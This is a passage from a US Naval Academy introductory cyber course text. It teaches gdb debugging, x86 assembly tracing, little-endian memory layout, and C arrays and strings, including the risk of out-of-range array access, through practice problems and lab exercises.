the stack? (Confirm your result!) Solution: Practice Problem 3.17 What assembly language instruction is located at 0x0804835b? Solution: 74 Memory address Value stored at this address Practice Problem 3.18 Sketch what you expect the stack to look like after the instruction at address 0x0804835b is executed. Solution: 75 Let’s execute a single instruction, and then freeze again! Enter the command: nexti Practice Problem 3.19 What two things happen when nexti is entered? Solution: 1. 2. Practice Problem 3.20 What should you type to examine memory for the hex values you sketched in Practice Problem 3.18? (Confirm your result!) Solution: Practice Problem 3.21 What should you type to examine memory for the integer 2001? (Confirm your result!) Solution: Congratulations! You've completed your first program autopsy! 76 Appendix: Memory Storage Example This material (Chapter 3) is the toughest chapter in EC310. Midshipmen in the past have struggled with the Chapter 3 material because it introduces a slew of new concepts (the debugger with its many cryptic new commands, assembly code, a first look at registers and memory organization, etc.), all of which are alien to anything you have seen before in any other USNA class. You should rest assured that with some effort the concepts will solidify. The remainder of this chapter contains an extended memory storage example. While this example will not be covered in class, it is recommended that you take time to work through it. Note that in each case that a question is asked, the correct answer follows. Suppose I have the following variable declarations in a C program: int char char int zz = 206578; letter1 = ‘v’; letter 2 = ‘N’; y = 154; Note: decimal 20657810 is 0x326F2 in hexadecimal character ‘v’ is 0x76 in hexadecimal (from ASCII table) character ‘N’ is 0x4E in hexadecimal (from ASCII table) decimal 15410 is 0x9A in hexadecimal Suppose when the program gets compiled with gcc, the compiler sets aside storage space in the main memory (RAM) for the program and its variables, and variable zz gets stored at the first memory address below, then letter1, then letter2, then y. Memory Address 0x08048374 0x08048375 0x08048376 0x08048377 0x08048378 0x08048379 0x0804837A 0x0804837B 0x0804837C 0x0804837D 0x0804837E 0x0804837F 0x08048380 0x08048381 Data at that Memory Address (Hex) 1. How many total bytes are used to store these variables in memory? Answer: 4 bytes for zz, 1 byte for letter1, 1 byte for letter2, 4 bytes for y: 10 bytes total 2. What are the actual bit values that will be stored in the memory? Give your answer as hexadecimal values. Answer: Variable zz is an integer, so is stored in 4 bytes (which is 8 hexadecimal digits). In memory, its value looks like: 0x000326F2 Variable letter1 is stored in one byte (which is 2 hexadecimal digits). In memory, its value looks like: 0x76 Variable letter2 is also stored in one byte, and in memory its value looks like: 0x4E Variable y is an integer, so it is stored in 4 bytes (8 hexadecimal digits), and in memory its value looks like: 0x0000009A 3. How will the values be stored in the memory? Answer: char values are stored in one byte, so they look as is. int values are stored in “little endian” format, so the least significant byte is stored FIRST in the memory location, and the most significant byte is stored LAST (this is the reverse order of what you’d think it should be). 77 The memory values will look as follows: Variable y Letter2 Letter1 zz Garbage bits Memory Address 0x08048374 0x08048375 0x08048376 0x08048377 0x08048378 0x08048379 0x0804837A 0x0804837B 0x0804837C 0x0804837D 0x0804837E 0x0804837F 0x08048380 0x08048381 Data at that Memory Address (Hex) 9A 00 00 00 4E 76 F2 26 03 00 10 00 00 A3 4. What are the values and addresses of the variables? Answer: y = 154 (which is 0x0000009A in hex), and the addresss of y is 0x08048374 letter2 = ‘N’ (which is 4E in hex), and the address of letter2 = 0x08048378 letter1 = ‘v’ (which is 76 in hex), and the address of letter1 is 0x08048379 zz = 206578 (which is 0x000326F2 in hex), and the address of zz is 0x0804837A 78 Problems 1. Examine the following C program and describe the expected output. (Note: The output for count%2 is the remainder of count divided by 2; i.e. 4%2 is 0, while 4%3 is 1.) #include<stdio.h> int main() { int count; for( count = 1; count <= 4 ; count = count + 1 ) { if( count %2 == 0) printf("Echo\n") ; else printf("Oscar\n") ; } } 2. What exactly will the following C program do after it is compiled and executed? 3. #include<stdio.h> int main() { int j; for(j = 10; j > 2; j = j - 2) { printf("Go Navy!\n"); } } What is the exact output of the program below if the user enters 5 when prompted? #include<stdio.h> int main( ) { int number , counter ; printf( "Enter a number: " ) ; scanf( "%d" , &number ); if( number != 5 ) printf( "I love EC310!\n" ); else printf( "What's for lunch?\n" ); for(counter = number ; counter < 10 ; counter = counter + 3) printf( "Navy\n" ); 4. } Consider this screenshot: (a) (b) What type of language is depicted in the screenshot below? Describe what this line of code accomplishes. 79 5. Consider the picture below: Memory address (a) (b) (c) 6. Value stored at this address In words: what is held in the eip register, i.e., what is the purpose of this register? (Your answer should not be: "804838d".) What would be displayed on the monitor by the command: x/xb $eip ? What would be displayed on the monitor by the command: x/s 0x08048475 ? (Hint: the string stops at the first byte that reads 0000 0000.) What is the exact output of the following C program if the user enters 4 when prompted to enter a start value? #include<stdio.h> int main () { int start_value , number; printf( "Enter a start value: "); scanf("%d" , &start_value ); for( number = start_value ; number != 12 ; number = number + 2 ) { printf("I love cyber!\n"); } } 7. Consider again the program shown in Question 6 above. What happens if the user enters 7 when prompted to enter a start value? 80 8. We would like to write a complete C program that prompts the user to enter an integer. The program should then provide the absolute value of the integer. See the screen capture below. Fill in the missing code in the two red boxes shown below so that the program executes successfully. Each red box is missing only one line of code! #include<stdio.h> int main () { int value; printf( "Enter an integer: "); scanf("%d" , &value ); if( { ) } printf("The absolute value of the number is: %d\n" , value ); } 9. In this problem we are going to use the program named firstprog.c which is located in the booksrc directory. We need to copy this file to the work directory. To copy the file named firstprog.c from the booksrc directory to the work directory, first ensure you are in your home directory be entering cd and then carefully enter the following at the home directory prompt: midshipman@EC310:~ $ cp booksrc/firstprog.c Make sure you are at your home directory! Verify that you have firstprog.c work Enter this! in your work directory by changing to the work directory: cd work and then listing the files in the work directory: ls You should see the firstprog.c file (along with perhaps some additional files from recent labs). The program firstprog.c is shown below #include <stdio.h> int main() { int i; for( i = 0; i < 10; i++ ) { printf("Hello World!\n"); } } 81 Note: i++ means exactly the same thing as i = i + 1 Compile your program using gcc: gcc –g firstprog.c and then run your program ./a.out to confirm it executes as expected. Then start the debugger by entering the following commands (hitting ENTER after each command) gdb –q ./a.out set dis intel list disassemble main break main run (a) The program has now stopped at the first line of code after the line int main( ). Recall that the eip register holds the address of the next instruction that will be executed. What is the address stored in the eip register? (b) What is the next assembly language instruction that will be executed? (c) Consider the assembly language instruction mov DWORD PTR [ebp-4],0x0 This instruction places the value 0 into the memory location whose address is stored at ebp-4. Enter nexti to execute this instruction What is the value of ebp? (d) What is the value of ebp–4? (e) What is stored in the address specified by the value ebp–4? Hint: Use the x/xw with your answer to question (d). (f) Look at the value of the instruction pointer (eip). Has it changed from your answer to part (a)? Why?/Why not? (g) The next assembly language instruction that will be executed is: cmp DWORD PTR [ebp-4],0x9 This instruction will compare the value of 9 to the value you examined in question (e). Referring back to the C source code, what do you think this assembly language instruction is doing? Enter nexti to execute this instruction (h) The assembly language instruction that will be executed next is jle 0x8048393 <main+31> 82 This instruction means: If the results of the preceding comparison showed that the value stored at the memory location whose address is stored at ebp-4 were less than or equal to 9, jump to address 0x8048393. Enter nexti once. What is the value of the eip register? If you answer to (h) is not 0x8048393 then you have gone off the rails! STOP! See your instructor (or MGSP). (i) Explain, in words, why the instruction pointer has the value that it has. (j) The assembly language instructions mov DWORD PTR [esp],0x8048484 moves the value 8048484 into the location pointed to by the stack pointer. Enter nexti once. What is the value of the address stored in the stack pointer (esp)? 10. (k) What is stored at the memory location whose address is in the stack pointer? (Hint: use x/xw to examine the value stored at the address specified by the stack pointer. (l) We would like to know the significance of the address 0x8048484 . What is stored at this location? (Hint: Examine the first four bytes stored starting at this memory location…think ASCII… could this be a string?) Consider the following C program. #include<stdio.h> int main() { int i; for( i=0; i < 4; i=i+2 ) { if( i >= 2 ) { printf(“Torpedoes\n”); } else { printf(“Howitzer\n”); } } } (a) (b) State how many times the loop will iterate. What will be printed to the screen when the program is executed? 83 11. Answer the following questions based on the below screen capture of assembly code in the debugger. (a) Part of the source code that generates this assembly code is the line: int x = 5; Which assembly language instruction corresponds to this C code? (b) What is the memory address (in hexadecimal) of the variable x? (c) What is the address of the next line of code to be executed? 84 Security Exercise 3 Part 1: Initial Set-up Open VMware and power on the EC310 virtual machine. You should be in your home directory: List the various files and directories using ls. You should see: Shown pictorially, the files and directories under your home directory look like this: Your instructors have prewritten many of the C programs you will need for EC310, and have placed them in the ec310code directory. We have done this because we care. In fact, as you are no doubt already aware, the ECE Department is known universally as The Caring Department. As you progress through the course, you should ensure the programs you are working on are located in your work directory. The program you will use today is named sx3.c and it is in the ec310code directory: We need to copy this file to the work directory. To copy the file named sx3.c from the ec310code directory to the work directory, carefully enter the following at the home directory prompt: midshipman@EC310:~ $ cp ec310code/sx3.c Make sure you are at your home directory! Enter this! 85 work If all went well, you should have a copy of sx3.c in your work directory. Verify that you have sx3.c in your work directory by changing to the work directory: cd work and then listing the files in the work directory: ls You should see the sx3.c file (along with perhaps some additional files from last lab): If you do not have sx3.c in your work directory STOP and ask your instructor or lab tech for help. Otherwise, proceed to Part 2. I'm a famous USNA grad. Don't you see the light? Who am I? Part 2: Running the C Program You should now be in the work directory: Examine the program sx3.c using nano (i.e., type in: nano sx3.c ). The C program is shown below: #include<stdio.h> int main( ) { int x; x = 5; if( x == 4) printf( "Army\n"); else printf("Navy\n"); 86 } Note that this is a silly program, because it is designed to always print out Navy. In other words, this program has no need for an if-else statement. We have intentionally written the program this way to give you practice traipsing through memory. Save the program by entering Control-o (where that is the letter o, not the number 0) saving the file under its current name, and exit nano by entering Control-x. Compile your program using gcc: gcc –g sx3.c and then run your program ./a.out to confirm it executes as expected. If your program is not working STOP and ask your instructor or lab tech for help. Otherwise, proceed to Part 3. Part 3: Program Autopsy: Case 2 Set up the debugger using the code shown below: gdb –q ./a.out After you press enter, you should see a line of gobbledygook (Using host libthread…) and then you should see the prompt change to (gdb) indicating that you are using the debugger. Then continue by entering the following commands (hitting ENTER after each command). set dis intel list disassemble main break main run . 87 Here is a screen capture of the assembly code you should see: Program has stopped here, at this breakpoint. Notice that the program has stopped at the breakpoint shown above. The line: Breakpoint 1 at 0x8048384: file sx3.c, line 5. means, in English: The next instruction that will be executed (but has not yet been executed) is stored in address 0x8048384. If we look for this address in the top part of the assembly code, we quickly find it: 88 Question 1: From the picture above, what should be the current value of the instruction pointer (i.e., what address is stored in the instruction pointer)? Verify your answer by inspecting the value of the instruction pointer by entering: i r eip Question 2: What is the next assembly language instruction that will be executed (but has not yet been executed)? Look at the line of code: mov DWORD PTR [ebp-4],0x5 What is this assembly language code trying to accomplish? In English, this assembly language instruction is saying: Place the value 5 in main memory at the location that has the address: ebp-4. Recall that ebp is one of the CPU's registers. Specifically, ebp points to one end of the region in main memory that the program has available to store the variables and values that it needs. Again: ebp holds an address. Whatever value is in ebp, the value of "ebp-4" will be the address four bytes earlier than ebp: So, the instruction ebp – 4: Question 3: mov DWORD PTR [ebp-4],0x5 would place the value 5 in the memory location specified by In my illustrative example above, where I entered the value 5 into address baaaa810, why did I block out (in blue) four bytes of memory? Recall that our C program is: 89 #include<stdio.h> int main( ) { int x; x = 5; if( x == 4) printf( "Army\n"); else printf("Navy\n"); } And the next assembly language instruction that will be executed (but has not yet been executed) is: mov DWORD PTR [ebp-4],0x5 Question 4: What line(s) of C code does this assembly language correspond to? Now, execute one line of machine code—the line above—by entering So… you have just executed the instruction Question 5: mov nexti DWORD PTR [ebp-4],0x5. Examine the assembly language code shown two pages back. What values do you expect to be stored in the instruction pointer? Verify your answer by examining the value of eip. (You know how to do this! i r eip .) If your answer to Question 5 did not end in the hexadecimal number b then STOP and ask your instructor or lab tech for help. Otherwise, proceed to Part 4. Part 4: Program Autopsy Continued Recall that the assembly language instruction you recently executed – mov DWORD PTR [ebp-4],0x5 – places the value 5 in the memory location specified by ebp–4 . Let's see if this is accurate! Question 6: What is the value stored in ebp? Question 7: What is the value of ebp-4? Question 8: Examine memory to determine what is stored in the address specified by ebp-4 . Use the examine command: x/x followed by the address you want to examine. For example, if you want to look at the contents of memory location 0xbffff800 you would enter x/x 0xbffff800. Question 9: In the picture below, which shows a section of the stack, fill in the value of ebp, write the addresses next to all memory locations, and fill in the values stored in locations. Specifically, fill in the hex value corresponding to the byte stored at each memory location shown in the diagram. (This picture is also replicated on your answer sheet.) Now look at the next line of code that will be (but has not yet been) executed: cmp DWORD PTR [ebp-4],0x4 90 In x86 assembly language, cmp means compare. Specifically, this line of code is comparing the value stored at the address ebp-4 to the value 4. Question 10: Are the two values — the value stored at location ebp – 4 and the integer 4 – equal to each other or not equal to each other? Question 11 Look again at your C program. What portion of C code do you think the assembly language instruction cmp DWORD PTR [ebp-4],0x4 corresponds to? Now, execute one line of code by entering nexti . You have just executed the instruction: cmp DWORD PTR [ebp-4],0x4 ). Question 12: By looking at the value stored in the instruction pointer, and by looking at the assembly language code shown a few pages back, what is the next line of assembly code that will be executed (but has not yet been executed)? If your answer to Question 12 did not end in the hexadecimal number f then STOP and ask your instructor or lab tech for help. Otherwise, proceed to Part 5. Part 5: Program Autopsy Continued Continued Look at the instruction: jne 0x804839f In x86, jne stands for jump if not equal. Recall that the preceding instruction did a comparison, and, based on the results of the comparison, we will have the answer: Yes, the two items that were compared are equal So the line of code jne 0x804839f or No, the two items that were compared are not equal. means, in English: If the two items we just compared are not equal, jump to instruction at address 0x804839f. Otherwise (if the items were equal), just continue with the next instruction in sequence. Question 13: Do you expect that after we execute the assembly language instruction jne 0x804839f the CPU will jump to 0x804839f as the next instruction? Explain. Now, execute one line of code by entering nexti . This will execute the line: jne Question 14: 0x804839f . What is the new value of the instruction pointer? Explain. Question 15: What is the next line of assembly language code that will be executed? (Look at the address in the eip register and find the corresponding assembly language instruction.) Let’s examine the assembly language instruction: mov DWORD PTR [esp],0x804848a This essentially says: The variable esp holds an address. Place the value 0x804848a in the location specified by this address. So, for example, if esp holds the address 56, then this will place the value 0x804848a in memory location 56. Execute this instruction by entering nexti. Question 16. The picture below shows a portion of the program's stack in main memory. Notice that the value 5 is stored at addresses bffff814 – bffff817. Complete the picture by filling in the value of the stack pointer (esp) as well as the contents of memory locations bffff810 – bffff813. Note that this figure is replicated on your answer sheet. 91 STOP . Show your instructor or lab tech your answer to Question 16. Then proceed to Part 6. Part 6: Be a Hacker! Our program is very interested in the address 0x804848a. It took the time to store this value on the stack, and the stack is used to store information the program needs to successfully execute. Question 17: Investigate what is so special about address 0x804848a . Look inside this address using the x/x command. Be a sleuth! Why does this address matter? (Hint: there are characters stored there!) The remaining part of the program simply prints the string of characters at address 0x804848a to the monitor. To exit out of the debugger, enter: quit . When you are asked: The program is running. Exit anyway? (y or n) select y. Part 7: EXTRA CREDIT Program Autopsy: Case 3 Using nano, change your C program by replacing the line x = 5; with the line x = 4; Then run the program line-by-line in the debugger (gdb) as before. Question 18: Your first breakpoint was at main. As you execute the program by repeatedly entering nexti, what is the first line of assembly language that is executed in this program that was not executed in the prior program? Question 19: What is the significance of the number 0x8048484 which appears in the assembly code? 92 Security Exercise 3 Answer Sheet Name: Question 1: Question 2: Question 3: Question 4: Question 5: Question 6: Question 7: Question 8: Question 9: Question 10: Question 11: Question 12: Question 13: 93 Question 14: Question 15: Question 16: Question 17: EXTRA CREDIT Question 18: Question 19: 94 Chapter 4: Arrays and Strings Objectives: (a) Describe how an array is stored in memory. (b) Define a string, and describe how strings are stored. (c) Describe the implications of reading or writing beyond the boundary of an array. (d) Describe how to change the values of individual array elements. 1. Arrays 1.1. Why Use Arrays? Consider the following problem: Suppose an instructor has just finished grading the six-week exams for the twenty midshipmen in her section of EC310. Write a C program that will compute the average and also determine how far each student’s individual grade is from the average. One way to start this program would be to declare twenty variables to hold the twenty grades: float student1_grade, student2_grade, student3_grade … etc., etc. This is cumbersome. All these variables! Ugh. Suppose there were 100 students in the section. We would need 100 variables to hold the 100 grades. Suppose we consider a different (better!) approach. Instead of having 20 separate variables to hold our 20 six-week exam scores, we will use a "large box with multiple slots." We might name the entire large box six_week_grade. The top slot will hold the first student’s six-week exam grade, the second slot will hold the second student’s six-week exam grade, and so forth. Instead of using the term "large box with multiple slots", let’s call this an array. In C, an array is frequently also termed a buffer. First student's grade goes here Second student's grade goes here Third student's grade goes here So that we can more easily draw our arrays, we will imagine that our section has five students. The concepts will, of course, apply to arrays of any size. Let's say, for the purposes of this discussion, that our five students: Mid 1, Mid 2, Mid 3, Mid 4 and Mid 5, have grades of 98, 87.5, 94, 90 and 92, respectively. 1.2. Arrays An array is a collection of data, all of the same type. Recall that when we say type we are referring to int, float or char. More precisely, an array is a consecutive group of memory locations, all with the same name, all holding the same type of data. Our array of five student grades (all of type float) might be arranged in main memory as: 95 First student's grade goes here Second student's grade goes here Third student's grade goes here Fourth student's grade goes here Fifth student's grade goes here Notice first that our five array elements are stored in consecutive memory locations. Second, note that the addresses are separated by four bytes, since each value of type float is stored in four bytes. The precise location in main memory where the array will be stored is determined by the compiler. You might be surprised to know that the third and most important point to note in the figure above are the ellipses (i.e., the three dots) shown at the top and bottom of the array! There are items in main memory "above" our array, and items in main memory "below" our array. Suppose we want to give our array the name: six_week_grade . Recalling that our array will hold five grades, each of type float, we can declare our array as: float six_week_grade[ 5 ] ; More generally, the syntax for declaring an array is type array_name [ number of items in the array ] ; All items stored in the array must be of the same type Same rules as for variable names Also called the "size" of the array; must be an integer or an expression that evaluates to an integer The following would all be valid examples of array declarations: float temperatures[31]; int calories[90]; float migraine_intensity_level[1000]; Returning to our example, when we first declare our array as float six_week_grade[ 5 ] ; the compiler will reserve adjacent memory for five variables of type float. The entire array will be named six_week_grade. The picture would look like this (where the exact addresses are chosen by the compiler): 96 The values stored in these memory locations are, presently, "garbage values". Note that when we declare an array, the size of the array can be a variable, so long as the variable has a value that is known. The following code is perfectly fine, and would produce the same array as that shown above: int number_in_class = 5 ; float six_week_grade[number_in_class ] ; This will work since by the time we reach the declaration for the array float six_week_grade[number_in_class ] ; the value of the size of the array (the variable named number_in_class) is already explicitly known from the a prior declaration that has already been encountered: int number_in_class = 5 ; Practice Problem 4.1 Write a declaration that could be used to hold the individual letter grades for 250 midshipmen. Solution: Obviously, we do not want garbage values in our array. How do we get our student grades into this array? 1.3. Array Elements The individual elements in the array are variables. Each individual memory location in the array is indexed by a position number in the array. In our array named six_week_grade, the individual variables in the array (i.e., the variables that will hold the 5 individual six-week scores) are indexed from 0 to 4. The index is placed in square brackets after the array name. So, the name of the first variable in the array is six_week_grade[0], the name of the second variable in the array six_week_grade[1] , and so forth. The individual array elements are variables and can be used in expressions just as you would ordinarily use any variable. So, for example, the line of code six_week_grade[ 2 ] = 94 ; would change our picture to this: 97 So, the third midshipman grade, which we refer to as six_week_grade[ 2 ], is now stored in the array. (The other four array values are still garbage values.) Important point guaranteed to cause confusion: Note that the first variable in the array has an index of zero, not one. This is counter-intuitive. In the above example, you would think that the first six-week exam grade should be indexed as six_week_grade[1]since, after all, it is the first score. You would be wrong! The first score in our array of scores is indexed as six_week_grade[0]. Most programming languages (e.g., C, C++, Java, JavaScript) start with the index at zero just to make it easier for the CPU to index into the array. We could fill in our array in memory by adding the lines of code: six_week_grade[ six_week_grade[ six_week_grade[ six_week_grade[ 0 1 3 4 ] ] ] ] = = = = 98 ; 87.5 ; 90 ; 92 ; after which our array is stored as shown: It bears repeating: The individual array elements are variables and can be used in expressions just as you would ordinarily use any variable. If we wanted to add two points to the first midshipman's grade we could use six_week_grade[ 0 ] = six_week_grade[ 0 ] + 2 ; If we wanted to read the value of the third midshipman's grade in from the keyboard, we could use scanf("%f", &six_week_grade[2] ); If we wanted to print the second midshipman grade to the monitor, we could use printf("%f" , six_week_grade[1] ); We can use array elements in Boolean expressions, such as if ( score[3] > 90 ).... 98 Note that when referring to an array element, the index does not need to be an integer constant. We can use any expression in the brackets that evaluates to an integer. As an example, the for loop below might be used to read in from the keyboard the grades for 5 students. for ( { number = 0 ; number < 5 ; number = number + 1 ) printf( "Enter score for student %d : " , number + 1 ); scanf( "%f" , &six_week_grade[ number ] ); } Practice Problem 4.2 Suppose we have 5 students in EC310. A portion of a C program that declares an array of floats named six_week_grade that will hold the midterm grades for the class is shown below. Your program should allow the user to enter the midterm grades at runtime, and should then print out the midterm grades. Your program output should appear as shown below: Fill in the one missing line of code. #include <stdio.h> int main() { float six_week_grade[5]; int number ; for ( { number = 0 ; number < 5 ; number = number + 1 ) printf( "Enter score for student %d : " , number + 1 ); scanf( "%f" , &six_week_grade[ number ] ); } for ( number = 0 ; number < 5 ; number = number + 1 ) { } } Practice Problem 4.3 Consider an array declared as float pay[4]; (a) How much memory is reserved for this array? Solution: (b) What are the four variables that are collected into this array? Solution: (c) What is the name of the array of four variables? Solution: (d) The first array element is stored at address 0x0000008e, what is the address of the second element? Solution: 99 1.4. Initialization of Arrays It is possible to initialize the values of an array in the array's declaration. To initialize arrays in the declaration, we place the initial values in braces, and separate the values with commas. Our array of student grades could have been initialized by the declaration: float six_week_grade[ 5 ] = { 98 , 87.5 , 94 , 90 , 92 }; There are some caveats to this: First, if we initialize only the first part of an array, the remaining elements are initialized to zero. For example, the declaration float six_week_grade[ 5 ] = { 98 , 87.5 }; has the exact same effect as float six_week_grade[ 5 ] = { 98 , 87.5 , 0 , 0 , 0 }; The second caveat: If you initialize an array when it is declared, you can omit the array size. The size will be set permanently to be the minimum size needed to store the initialization values. So, for example, the array declaration float six_week_grade[ 5 ] = { 98 , 87.5 , 94 , 90 , 92 }; is the same as the declaration float six_week_grade[ ] = { 98 , 87.5 , 94 , 90 , 92 }; When dealing with arrays, you must note that we use the square brackets [ and ] in two different ways: In the array declaration, the number in the square brackets gives the size of the array (i.e., the number of items in the array). This value must be known when the array is declared. Anywhere outside the declaration, the number in the square brackets tells which element in the array (the specific variable) we are referring to. After six pages of array syntax, you might be thinking: "Wonderful, so what?" As we will see arrays have a horrendous security vulnerability baked into them. 1.5. The Dreaded Out-of-Range Error C will not prevent you from trying to access an array element that is out of the array's range. Stated another way, C will not prevent you from trying to read to or write to "nonexistent" array elements. What exactly does this mean? Consider the array declaration int salary[3]; which declares an array with three variables: salary[0], salary[1] and salary[2]. But what happens if we have a statement such as printf( “%d” , salary[3] ); when there is no variable salary[3]? Let's see! Consider the program below. #include <stdio.h> int main() { int salary[3] = { 1000 , 1500 , 2000 }; int j; for ( j = 0 ; j <= 3 ; j = j + 1 ) { printf("Salary %d is %d \n" , } j+1 , salary[j] ); } The output from this program is: No compilation error results in the program above...but do you see the potential dangers? Where does the last number come from? The answer: It is the value that is located in memory immediately after salary[ 2 ]! This is a garbage value. 100 When we index an array variable using an index outside the range of indices specified in the array's declaration, we commit an "out-of-range error." Again, it is critical to note that C will not prevent you from looking into memory beyond the end of your array. What would be the danger in the following program snippet? float salary[3]; int j; (other code not shown) for ( j = 0 ; j <= 3 ; j = j + 1 ) { printf("Enter salary %d: ", j + 1 ); scanf( "%f" , &salary[j] ); } (more code) The program above does not produce any compilation errors, but running this program is potentially very dangerous. Do you see why? Notice that the for loop, in its final iteration, attempts to enter a value into a variable named salaries[3]. There is no variable named salaries[ 3 ]! The program will simply write over whatever was stored in the memory location following salaries[ 2 ]. We now switch gears (slightly) and talk about arrays of characters—that is, arrays where each element in the array is of type char. 2. Strings 2.1. Introduction Suppose the contents of 5 consecutive bytes in computer memory are as follows: 0100 0110 0111 0111 0000 1110 0001 0110 1001 0000 101 As ASCII characters, this is the same as: 'N' 'a' 'v' 'y' 0 Note that 0 is the NULL character. In C, a string of characters is a NULL-terminated sequence of characters. 2.2. String literals A literal is similar in notion to a constant. For example, the integer 5 is a literal. The float value 3.1416 is a literal. We can have string literals as well. A string literal is written as a list of characters enclosed within double quotes. For example, "Navy" is a string literal. Although the length of the string is 4 (the 4 characters 'N', 'a', 'v' and 'y'), it takes 5 bytes to store this string in memory. This is because the NULL character has to be included for C to treat the collection of characters as a string. 2.3. String variables In C, strings—i.e., sequences of characters—are stored as arrays of characters. Here is an example of declaring a string variable using a character array: char school[5] = "Navy"; The array named school holds 5 characters: 'N', 'a', 'v', 'y', 0. It is worth noting again that the length of the string "Navy" is 4, but it actually has 5 characters, since the NULL character which appears at the end is actually part of the string. So if you want a string to hold "Navy", it must have space allotted for at least 5 characters. You may be wondering: Why the zero at the end of the string? What's up with that? The zero at the end tells C when to stop accessing the array! For example, we have seen many times already that strings are printed to the screen with the %s conversion specifier, as in: printf( "Go %s! Beat %s!\n", school, "Army" ); How does the printf know when to stop printing out the string named school? As it turns out, printf will print out the first element in the array named school, and then printf will continue to print out characters, one-by-one, until it reaches the zero i.e., the NULL). 2.3. Changing the value of a string variable We can initialize a string variable when it is declared (as in char school[5] = "Navy"; ). But, if we assign a string a value when it is declared, can we change the value later? With other types, such as int, float and char, you were allowed to assign values to the variables in a manner like this: int favorite_number ; favorite_number = 7 ; Unfortunately, assignments cannot be done like this with strings. The code below will not compile: char school[5]; school = "Navy"; So… how can we change the value of a string? There are two ways. 102 Changing a string value character by character. We can change the value of a string by changing the values of the individual characters. For example: char school[5] = "Navy"; printf( "%s\n", school ); school[0] = 'U'; school[1] = 'S'; school[2] = 'N'; school[3] = 'A'; printf( "%s\n" , school ); Practice Problem 4.4 Continuing the example above, what would happen if we modified two lines of code as shown below: school[2] = 'A'; school[3] = 0 ; printf( "%s\n", school ); Solution: Changing a string value using strcpy The second way to change a string’s value is with the “string copy” function. The syntax is strcpy( s1 , s2 ); This function copies the string s2 to the string s1. When the string s2 is copied over the string s1, the strcpy function automatically places a closing NULL at the end of the new (modified) string s1. To use the function strcpy, you must have the following line at the top of your program: #include<string.h> One final note about strings. When entering strings from the keyboard don’t use the ampersand: &. For example, to enter a midshipman's last name from the keyboard, we would use: char mid_name[24] ; scanf( "%s " , mid_name ); As an introduction to the dangers inherent in using arrays, you might find it useful to view two videos: "It came from California… the students were safe… their computers weren't…" : https://www.youtube.com/watch?v=fj8S6Hd-5bk What's that you say? You don't see the danger!. Let's watch another video from March 2009 (the first 4 minutes is enough). http://www.cbsnews.com/videos/the-internet-is-infected/ Practice Problem 4.5 We want to write a C program that declares a string (a character array) and initializes it to "Military Academy", prints this string to the screen, then, within the program, changes the string to the name of your favorite college, and then, once again, prints the string to the monitor. Your program output should appear as shown below: Fill in the three missing lines of code. Solution: #include <stdio.h> #include<string.h> int main() { 103 char phrase[] = "Military Academy" ; } Practice Problem 4.6 Answer the questions about the character string in memory shown below, where the first element in the string is 0x53. (a) What is the minimum number of bytes that could have safely been allocated for this string ? (b) Write this declaration, naming the array 'myString' . (c) What is the address of 'myString[0]' ? (d) What character is at myString[1]? Solution: (a) (b) (c) (d) Practice Problem 4.7 (a) Write the declaration for an array named LuckyNumbers which will hold 6 integers. Solution: (b) Complete this statement to display the 4th LuckyNumber: printf("The fourth lucky number is %d\n", Solution: printf("The fourth lucky number is %d\n", (c) What happens if I attempt to display LuckyNumbers[9]? i. Will it return a value? ii. Will I receive an error message? iii. Will the program crash? Solution: i: ii: iii: 104 ); ); Problems 1. 2. To create a variable that contains a letter of the alphabet: a) What data type will I need to use? b) What special data structure will group a collection of these letters into a word or sentence? Consider the section of main memory shown below. The address of one of the individual bytes is also shown on the figure. The decimal (base-10) integer value of 150 is stored at address 00003D18. a) On the picture above, show how the value of 150 would be stored in main memory. Use hexadecimal notation. b) Annotate the diagram above to show the addresses for each byte in memory that is depicted on the figure (so that all nine bytes have the proper address shown). What would be displayed on the monitor by the command: x/xb 0x00003D18 ? d) What would be displayed on the monitor by the command: x/xh 0x00003D18 ? What would be displayed on the monitor by the command: x/xw 0x00003D18 ? c) e) 3. Move the program char_array2.c from the booksrc directory to your work directory. Run the code with the debugger by entering the seven lines of code shown on page 85 of Chapter 3, EXCEPT instead of the line "break main" use "break 6". This will insert a breakpoint at line 6 (which should correspond to the blank line in the code listing). Thus, you will run the program up to the breakpoint at line 6. a) In words (a sentence or two), what does this program do? b) At the breakpoint (where your program stops), what is the value of the instruction pointer? c) At the breakpoint, what would be the result of entering x/i $eip ? 105 4. Consider the picture below, where all memory contents are in hexadecimal: a) In words: what is held in the eip register, i.e., what is the purpose of this register? (Your answer should not be: "804838d".) b) What would be displayed on the monitor by the command: i r eip ? c) What would be displayed on the monitor by the command: x/xb $eip ? d) What would be displayed on the monitor by the command: i r esp ? 5. 6. 7. e) What would be displayed on the monitor by the command: x/xw $esp ? f) What would be displayed on the monitor by the command: x/xb 0x08048475 ? g) What would be displayed on the monitor by the command: x/xs 0x08048475 ? What is the fundamental issue with C that makes a buffer overflow exploit possible? Use the array declaration to answer the questions. float wins[6] = {3.4,7,4,6.1,9,10}; a) How many bytes are allocated for this array? b) What value is stored in wins[1]? c) What value is stored in wins[6]? Let’s pretend there are 5 students in EC310. We want to write a C program that declares an array named EC310midterm that will hold the midterm grades for the class. The program should allow the user to enter the midterm grades at runtime, and should then print out the average of the midterm grades. Here is an example of how the program should appear: Since your EC310 instructors "exist to serve", they have provided you with the source code. Since your EC310 instructors also have a mean streak, they have left several strategic lines of code missing. #include <stdio.h> int main() { int num_students = 5; 106 float EC310midterm[ ]; int number; float sum = 0; float average; for ( ; ; { printf( "Enter score for student %d : " , number + 1); scanf( "%f" , &EC310midterm[ number ] ) ); sum = sum + ; } average = ; printf( "Class midterm average: %f \n" , average ); } 8. Enter this program, filling in the correct (missing) lines of code. Run the program to ensure it works correctly. It is recommended that you type this code, rather than cut-and-paste. Turn in a copy of your source code and a screen capture of your program successfully running. (Note: To perform a screen capture, hold down the Control, Alt and PrintScreen keys, all at the same time. This will save a picture of the screen to the clipboard which you can paste it into an MSWORD doc.) In the program presented in Problem 7 above, if the line of code: EC310midterm[5] = 100 ; was added to the end of the existing code, would the program still compile? If so, describe what we might expect the effect to be. 107 108 Security Exercise 4 Part 1: Initial Set-Up Your instructors have prewritten three of the C programs that you will use for this lab, and have placed them in the ec310code directory. We have done this because we care. 10 The programs you will use today are named sx4a.c , sx4b.c and sx4c.c and these three programs are sitting in the ec310code directory: We need to copy these files to the work directory. To copy them from the ec310code directory to the work directory, carefully enter the following at the home directory prompt: midshipman@EC310:~ $ cp ec310code/sx4a.c Make sure you are at your home directory! work Enter this! Now carefully enter the following two lines at the home directory prompt midshipman@EC310:~ $ cp ec310code/sx4b.c 